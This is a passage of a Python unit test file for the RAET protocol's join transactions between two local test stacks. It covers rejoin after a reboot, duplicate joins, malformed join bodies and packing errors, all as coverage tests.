self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup losss
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
self.assertEqual(beta.puid, 2)
data = beta.keep.loadLocalData()
# now lose all beta remotes and reboot beta stack
for remote in beta.remotes.values():
beta.removeRemote(remote, clear=True)
# Close down beta stack
beta.server.close()
# reboot beta stack
beta = self.createRoadStack(data=betaData)
self.assertIs(beta.main, betaData['main'])
self.assertIs(beta.keep.auto, betaData['auto'])
self.assertIs(beta.kind, betaData['kind'])
self.assertIs(beta.mutable, betaData['mutable'])
self.assertEqual(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(beta.keep.dirpath, betaData['dirpath'])
data = beta.keep.loadRemoteRoleData(role= alpha.local.role)
self.assertEqual(data['role'], alpha.local.role)
self.assertEqual(data['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(data['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(data['pubhex']), alpha.local.priver.pubhex)
self.assertEqual(beta.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(beta.puid, 2)
# create remote to join to alpha
newBetaRemoteAlpha = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# will reject since nuid changed for newBetaRemoteAlphs
self.assertNotEqual(newBetaRemoteAlpha.nuid, betaRemoteAlpha.nuid)
self.assertIs(beta.mutable, False)
self.assertIs(alpha.mutable, False)
self.join(beta, alpha, deid=newBetaRemoteAlpha.uid)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 1)
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 0)
self.assertIn('joiner_rx_reject', beta.stats)
self.assertEqual(beta.stats['joiner_rx_reject'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
self.assertEqual(beta.puid, 3)
# redo after resetting beta.puid to 1
beta.puid = 1
self.assertEqual(beta.puid, 1)
newBetaRemoteAlpha = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.assertEqual(beta.puid, 2)
self.assertIs(beta.mutable, False)
self.assertIs(alpha.mutable, False)
self.join(beta, alpha, deid=newBetaRemoteAlpha.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(newBetaRemoteAlpha, betaRemoteAlphaSave))
self.assertTrue(self.sameRoleKeys(newBetaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(newBetaRemoteAlpha.nuid, alphaRemoteBeta.fuid)
self.assertEqual(newBetaRemoteAlpha.fuid, alphaRemoteBeta.nuid)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(newBetaRemoteAlpha, remoteData))
self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerJoinInProcess(self):
'''
Test joiner.join do nothing if there is a join in process. (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinInProcess.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test 1: another joiner transaction in process
console.terse("\nTest joiner in process *********\n")
beta.join()
self.assertEqual(len(beta.transactions), 1) # 1 transaction is created
beta.join()
self.assertEqual(len(beta.transactions), 1) # nothing is created
self.serviceStacks([beta, alpha])
# Check join is done
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertTrue(alpha.remotes.values()[0].joined)
# Test 2: another joinent transaction in process
console.terse("\nTest joinent in process *********\n")
alpha.join()
self.serviceStacks([alpha]) # send
self.serviceStacks([beta], duration=0.1) # receive
self.assertEqual(len(beta.transactions), 1) # 1 transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure there is no tx packets
beta.join()
self.assertEqual(len(beta.transactions), 1) # no new transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet added
self.serviceStacks([beta, alpha])
# Check join is done
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertTrue(alpha.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerJoinInvalidKind(self):
'''
Test joiner.join do nothing if stack kind is invalid (<0 or >255) (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinInvalidKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test:
console.terse("\nTest joiner join invalid kind *********\n")
beta.kind = -1
beta.join()
self.assertEqual(len(beta.transactions), 0) # no transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
beta.kind = 256
beta.join()
self.assertEqual(len(beta.transactions), 0) # nothing is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerJoinPackError(self):
'''
Test joiner.join handles pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinPackError.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test:
self.assertEqual(len(beta.txes), 0)
beta.clearStats()
console.terse("\nTest joiner join pack error *********\n")
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
beta.join() # will fail with packing error
raeting.UDP_MAX_PACKET_SIZE = default_size
self.assertEqual(len(beta.transactions), 0) # transaction is removed
self.assertIn('packing_error', beta.stats) # transaction failed
self.assertEqual(beta.stats['packing_error'], 1)
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerProcessNoPacketTimeout(self):
'''
Test joiner.process timeout when no tx packets (coverage)
'''
console.terse("{0}\n".format(self.testJoinerProcessNoPacketTimeout.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner process timeout when no tx packet *********\n")
beta.join() # create join transaction
self.assertEqual(len(beta.transactions), 1) # ensure there is only one transaction
beta.transactions[0].txPacket = None # make txPacket None
self.store.advanceStamp(stacking.RoadStack.JoinerTimeout) # set timeout expiresd
self.assertEqual(len(beta.transactions), 1)
self.serviceStacks([beta]) # Process
self.assertEqual(len(beta.transactions), 0)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinErrorParseInner(self):
'''
Test joinent.join handles parseInner error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joinent join parseInner error *********\n")
# join beta to alpha with broken packet inner
remote = beta.retrieveRemote()
self.assertIsNotNone(remote)
timeout = beta.JoinerTimeout
data = odict(hk=beta.Hk, bk=beta.Bk)
joiner = transacting.Joiner(stack=beta,
remote=remote,
timeout=timeout,
txData=data)
data['ck'] = -1
joiner.join()
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('parsing_inner_error', alpha.stats) # Error occured
self.assertEqual(alpha.stats['parsing_inner_error'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
# redo the broken packet then drop it
self.serviceStacks([alpha, beta], duration=10.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(alpha.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingName(self):
'''
Test joinent.join handles body data missing required name field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no name
alpha.clearStats()
console.terse("\nTest joinent join missing name *********\n")
orig_name = beta.local.name
beta.local.name = None
beta.join()
beta.local.name = orig_name
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingVerhex(self):
'''
Test joinent.join handles body data missing required verhex field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingVerhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no verhex
alpha.clearStats()
console.terse("\nTest joinent join missing verhex *********\n")
orig_verhex = beta.local.signer.verhex
beta.local.signer.verhex = None
beta.join()
beta.local.signer.verhex = orig_verhex
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingPubhex(self):
'''
Test joinent.join handles body data missing required pubhex field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingPubhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no verhex
alpha.clearStats()
console.terse("\nTest joinent join missing pubhex *********\n")
orig_pubhex = beta.local.priver.pubhex
beta.local.priver.pubhex = None
beta.join()
beta.local.priver.pubhex = orig_pubhex
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingRole(self):
'''
Test joinent.join handles body data missing required role field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no verhex
alpha.clearStats()
console.terse("\nTest joinent join missing role *********\n")
orig_role = beta.local.role
beta.local.role = None
beta.join()
beta.local.role = orig_role
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingMode(self):
'''
Test joinent.join handles body data missing required mode field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingMode.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no verhex
alpha.clearStats()
console.terse("\nTest joinent join missing mode *********\n")
orig_role = beta.local.role
beta.local.role = None
# stack join
remote = beta.retrieveRemote()
self.assertIsNotNone(remote)
joiner = transacting.Joiner(stack=beta,
remote=remote,
timeout=beta.JoinerTimeout,
txData=odict(hk=beta.Hk, bk=beta.Bk))
# joiner join
remote.joined = None
if beta.kind is None:
beta.kind = 0
# Hack: Set mode to None here
body = odict([('name', beta.local.name),
('mode', None),
('kind', beta.kind),
('verhex', str(beta.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(beta.local.priver.pubhex.decode('ISO-8859-1'))),
('role', beta.local.role)])
packet = packeting.TxPacket(stack=beta,
kind=raeting.PcktKind.request.value,
embody=body,
data=joiner.txData)
packet.pack()
console.concise("Joiner {0}. Do Join with {1} at {2}\n".format(
beta.name, beta.name, beta.store.stamp))
joiner.transmit(packet)
joiner.add(index=joiner.txPacket.index)
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinMissingKind(self):
'''
Test joinent.join handles body data missing required kind field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
alpha.clearStats()
console.terse("\nTest joinent join missing kind *********\n")
# stack join
remote = beta.retrieveRemote()
self.assertIsNotNone(remote)
joiner = transacting.Joiner(stack=beta,
remote=remote,
timeout=beta.JoinerTimeout,
txData=odict(hk=beta.Hk, bk=beta.Bk))
# joiner join
remote.joined = None
flags = [0, 0, 0, 0, 0, 0, 0, beta.main] # stack operation mode flags
operation = packByte(fmt=b'11111111', fields=flags)
# Hack: Set kind to None here
body = odict([('name', beta.local.name),
('mode', operation),
('kind', None),
('verhex', str(beta.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(beta.local.priver.pubhex.decode('ISO-8859-1'))),
('role', beta.local.role)])
packet = packeting.TxPacket(stack=beta,
kind=raeting.PcktKind.request.value,
embody=body,
data=joiner.txData)
packet.pack()
console.concise("Joiner {0}. Do Join with {1} at {2}\n".format(
beta.name, beta.name, beta.store.stamp))
joiner.transmit(packet)
joiner.add(index=joiner.txPacket.index)
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinDuplicateJoinent(self):
'''
Test joinent.join handles duplications (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinDuplicateJoinent.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
console.terse("\nTest joinent join duplicate joinent *********\n")
beta.join() # join beta to alpha
self.assertEqual(len(beta.transactions), 1)
beta.remotes.values()[0].transactions.values()[0].remove() # drop first transaction
beta.join() # join beta to alpha again
self.serviceStacks([beta], duration=0.1) # send 2 transactions
self.serviceStacks([alpha], duration=0.1) # receive and handle 2 transactions
self.assertEqual(len(alpha.transactions), 1) # the only first request is added to alpha
self.assertEqual(len(beta.transactions), 1) # the only 2nd transaction is on beta
self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertIsNone(remote.joined)
# redo the broken transactions then drop them
self.serviceStacks([alpha, beta], duration=10.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertIsNone(stack.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousJoinentJoinDuplicateNonVacuousJoiner(self):
'''
Test joinent.join handles duplications (coverage)
Vacuous joinent found existing non-vacuous joiner
Nack itself
'''
console.terse("{0}\n".format(self.testVacuousJoinentJoinDuplicateNonVacuousJoiner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
console.terse("\nTest vacuous joinent join duplicate non vacuous joiner *********\n")
# Initiate 2 transactions
orig_fuid = alpha.remotes.values()[0].fuid
alpha.remotes.values()[0].fuid = 0
alpha.join() # vacuous join alpha to beta
alpha.remotes.values()[0].fuid = orig_fuid
self.assertEqual(len(alpha.transactions), 1)
# This step is incorrect from the logic viewpoint but good enough for coverage test.
alpha.transactions[0].vacuous = False # imitate non-vacuous
beta.remotes.values()[0].fuid = 0
beta.join() # vacuous join beta to alpha
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 1)
self.serviceStacks([beta], duration=0.1) # send beta join to alpha
self.serviceStacks([alpha], duration=0.1) # receive and handle beta join to alpha
# send alpha join to beta and the response
self.assertEqual(len(alpha.transactions), 1) # the only first request is added to alpha
self.assertEqual(len(beta.transactions), 1) # the only 2nd transaction is on beta
self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertIsNone(remote.joined)
# redo the broken transactions then drop them
self.serviceStacks([alpha, beta], duration=10.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testNonVacuousJoinentJoinDuplicateVacuousJoiner(self):
'''
Test joinent.join handles duplications (coverage)
Non-vacuous joinent found existing vacuous joiner
Nack joiner, continue itself
'''
console.terse("{0}\n".format(self.testNonVacuousJoinentJoinDuplicateVacuousJoiner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
alpha.mutable = True
console.terse("\nTest non vacuous joinent join duplicate vacuous joiner *********\n")
# Initiate 2 transactions
alpha.remotes.values()[0].fuid = 0
alpha.join() # vacuous join alpha to beta
self.assertEqual(len(alpha.transactions), 1)
beta.join() # non-vacuous join beta to alpha
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 1)
self.serviceStacks([beta], duration=0.1) # send beta join to alpha
self.serviceStacks([alpha], duration=0.1) # receive and handle beta join to alpha
# send alpha join to beta and the response
self.assertEqual(len(alpha.transactions), 1) # joiner removed, joinent refused as changing immutable
self.assertEqual(len(beta.transactions), 1) # the only 2nd transaction is on beta
self.assertIn('joiner_transaction_failure', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joiner_transaction_failure'], 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertIsNone(remote.joined)
# redo the broken transactions then drop them
self.serviceStacks([alpha, beta], duration=10.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(stack.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinDuplicateJoinerMatchNames(self):
'''
Test joinent.join handles duplications (coverage)
Non-vacuous joinent found existing non-vacuous joiner
Joinent name < joiner name
Nack joinent transaction
Joinent name >= joiner name
Nack joiner transaction
'''
console.terse("{0}\n".format(self.testJoinentJoinDuplicateJoinerMatchNames.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
console.terse("\nTest joinent join duplicate joiner local name less than remote *********\n")
# Initiate 2 transactions
alpha.join() # non-vacuous join alpha to beta
beta.join() # non-vacuous join beta to alpha
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 1)
# redo the broken transactions then drop them
self.serviceStacks([alpha, beta], duration=10.0)
self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(stack.remotes.values()[0].joined)
# Test:
alpha.clearStats()
console.terse("\nTest joinent join duplicate joiner remote name less than local *********\n")
alpha.name = 'gamma' # 'gamma' > 'beta'
beta.mutable = True
# Initiate 2 transactions
alpha.join() # non-vacuous join alpha to beta
beta.join() # non-vacuous join beta to alpha
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 1)
# redo the broken transactions then drop them
self.serviceStacks([alpha, beta], duration=10.0)
self.assertIn('joiner_transaction_failure', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(stack.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousEphemeralJoinentJoinIncorrectRemoteId(self):
'''
Test vacuous ephemeral joinent.join with remote id don't match (coverage)
'''
console.terse("{0}\n".format(self.testVacuousEphemeralJoinentJoinIncorrectRemoteId.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test conditions:
# 1. Vacuous
beta.remotes.values()[0].fuid = 0
# 2. Ephemeral
alpha.removeRemote(alpha.remotes.values()[0])
# 3. remote.fuid != packet data eid
# Would be hacked in the test.
# Test:
alpha.clearStats()
console.terse("\nTest remote id don't match *********\n")
# Initiate transaction
beta.join() # vacuous join beta to alpha
self.serviceStacks([beta], duration=0.1)
# Service alpha receive and call join
alpha.serviceReceives()
# service rxes
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=alpha, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
fuid = packet.data['se'] + 1 # hack fuid
remote = estating.RemoteEstate(stack=alpha,
fuid=fuid,
sid=packet.data['si'],
ha=(packet.data['sh'], packet.data['sp']))
alpha.correspond(packet, remote)
alpha.process()
self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testNonVacuousJoinentJoinNoDestinationIdMatch(self):
'''
Test non vacuous joinent.join with remote id absent in stack (coverage)
'''
console.terse("{0}\n".format(self.testNonVacuousJoinentJoinNoDestinationIdMatch.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
console.terse("\nTest absent remote id *********\n")
# Initiate transaction
beta.join() # non-vacuous join beta to alpha
self.serviceStacks([beta], duration=0.1)
# Service alpha receive and call join
alpha.serviceReceives()
# service rxes
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=alpha, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
# hack: create new remote that doesn't the same as on in stack.remotes[de/leid]
remote = estating.RemoteEstate(stack=alpha,
fuid=packet.data['se'],
sid=packet.data['si'],
ha=(packet.data['sh'], packet.data['sp']))
alpha.correspond(packet, remote)
alpha.process()
self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinErrorAddRemote(self):
'''
Test joinent.join got error on add remote (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinErrorAddRemote.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
alpha.clearStats()
console.terse("\nTest remote id don't match *********\n")
# Initiate non vacuous transaction
beta.join() # vacuous join beta to alpha
self.serviceStacks([beta], duration=0.1)
# Service alpha receive and call join
alpha.serviceReceives()
# service rxes
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=alpha, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
# Hack: change stack uid
# Joinent will not find remote by uid in the stack and will try to re-add.
# Add will fail by name unique check
remote = alpha.remotes.values()[0]
remote.uid += 1
self.assertNotIn(remote.uid, alpha.remotes)
alpha.correspond(packet, remote)
alpha.process()
self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentReceiveRefuse(self):
'''
Test joinent.join got error on add remote (coverage)
'''
console.terse("{0}\n".format(self.testJoinentReceiveRefuse.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Pend transaction
alpha.keep.auto = raeting.AutoMode.never.value
alpha.keep.pendRemote(alpha.remotes.values()[0])
alpha.clearStats()
# Test:
console.terse("\nTest joinent recieve refuse *********\n")
# Initiate non vacuous transaction
beta.join() # initiate transaction
beta.transactions[0].nack(kind=raeting.PcktKind.refuse.value)
self.serviceStacks([beta], duration=0.1) # send 2 packets
# receive 2 packets on alpha
# 1. Create transaction, pend join
# 2. Handle refuse
self.serviceStacks([alpha], duration=0.1)
self.assertIn('joinent_rx_refuse', alpha.stats) # Error handled
self.assertEqual(alpha.stats['joinent_rx_refuse'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentAckPendErrorPack(self):
'''
Test joinent.ackPend packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentAckPendErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Pend beta on alpha
alpha.keep.auto = raeting.AutoMode.never.value
alpha.keep.pendRemote(alpha.remotes.values()[0])
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
